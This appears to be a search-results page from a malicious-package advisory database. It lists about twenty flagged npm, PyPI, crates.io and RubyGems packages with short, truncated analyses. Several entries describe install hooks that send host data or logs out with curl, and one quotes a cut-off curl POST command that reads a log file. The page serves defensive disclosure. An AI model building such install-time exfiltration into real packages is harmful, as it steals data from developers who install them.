163 matches found
Malicious code in dttsdee (npm)
Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...
MAL-2026-6459 Malicious code in easy-string-kit (npm)
Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...
Malicious code in zomato-server (npm)
Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...
Malicious code in js-shared-modules (npm)
Source: amazon-inspector b5d28882e3ff8afe78db631ca5e1129d2b08f976f17f66ffe2b14834184ce09a package.json declares "postinstall": "node poc.js", which fires automatically on every npm install. poc.js reads os.hostname, hex-encodes it, and...
MAL-2026-4184 Malicious code in stripe-internal-utils (npm)
Source: amazon-inspector b6add7fd3034c5b0d00e39e2cbfeb7c664085ef412612b53ebe9fd81767449be package.json declares a postinstall hook that auto-fires on npm install and performs reconnaissance + exfiltration against the installer. The inline...
Malicious code in npmjs_solc-helper (npm)
Source: amazon-inspector b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71 The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run curl -s...
Malicious code in money-badger-open-rpc-test-bugbount (npm)
Source: amazon-inspector 35c3ecacb08f3cfb0b165eadaafd3a0d6acfffc34898a6149370c8cc9ba3843e The package money-badger-open-rpc-test-bugbount was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-3361 Malicious code in 24712-pl5004 (npm)
Source: amazon-inspector 3d79bb37b62b8d47ca459db0858a93ffb3c35e3791423c11a0853fb4ab17388e The package 24712-pl5004 was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-3103 Malicious code in amzn_codewhisperer_streaming_client (crates.io)
Source: ossf-package-analysis 7fc27be867bc1ae651b345d2f825d0ac8d796615c022747306e87bd3ff0d1fc8 The OpenSSF Package Analysis project identified 'amzn-codewhisperer-streaming-client' @ 99.0.1 crates.io as malicious. It is considered maliciou...
MAL-2026-3017 Malicious code in react-spa-npm (npm)
Source: amazon-inspector 43b35510ff33bc6f887152176f91fb63f2a336c8822c151ac6039ccced83c96b The package react-spa-npm was found to contain malicious code. Source: ghsa-malware c9044f471d6c131db0da2c97994b81cd8d2680486695f42dec152b2b23f5e0be...
MAL-2026-2985 Malicious code in @bmg-web/bmg-dialog (npm)
Source: amazon-inspector 9d560386e011639d154483a6156d3ffca4b0f0c58b20063d6e8ea51d5a295d2a The package @bmg-web/bmg-dialog was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-2920 Malicious code in buffer-util-extend (npm)
Source: amazon-inspector 374d8c5c4c32544741d1ea3788cfbccc3ee175f7181f8bdfa71cf4fde44121eb On require/import, index.js decodes a base64 string literal to https://www.jsonkeeper.com/b/CWOV9, fetches that anonymous JSON paste, and passes the...
Malicious code in ixosmonitoring (PyPI)
Source: kam193 cfca4d7a38a0805f56b3bddcef1b421a8584a4d52df7a1a22676369679347bf5 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in ks-hex2pcap (PyPI)
Source: kam193 90b58f7aa303c563186a1d1c2a89d13caec4e0c04a48f6838fcba294b7846e96 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-2266 Malicious code in monolith-twirp-copilot-registry (RubyGems)
Source: ossf-package-analysis d1eb9592b2f976d7d487d44c8f45592b2953e5f51edfeee7242e020dfb64176f The OpenSSF Package Analysis project identified 'monolith-twirp-copilot-registry' @ 1.0.6 rubygems as malicious. It is considered malicious...
MAL-2026-2239 Malicious code in chaostoolkit-turbulence (PyPI)
Source: kam193 0d12e5d6a53ae410fe90d76b8da4f9f117a8891e73a678c5b5f49059ad31fa6b Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-2235 Malicious code in srcsrctest (npm)
Source: amazon-inspector a44b46855732b5a5522c0a1ea3ef88d5977daad1bfa5c39b42e0324e52fcf6f8 The package srcsrctest was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-2234 Malicious code in security-install-analytics (npm)
Source: amazon-inspector ae1479aa9ec70d315ba69eec145d02655fe633a7f253ba7b0b3d082895b1ca35 The package security-install-analytics was found to contain malicious code. Source: ossf-package-analysis...
MAL-2026-2171 Malicious code in globally (PyPI)
Source: kam193 1f2d16dd9f9dc8f8c54504946e96b931fab9f6c893012e17b0c03dd531c49f5b Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-2007 Malicious code in uniswap-info (npm)
Source: amazon-inspector a4b0c2ab6814aa67c139dffb11add8c0013caa86df1cffd6c9e1c0de09bd395c The package uniswap-info was found to contain malicious code. Source: ossf-package-analysis...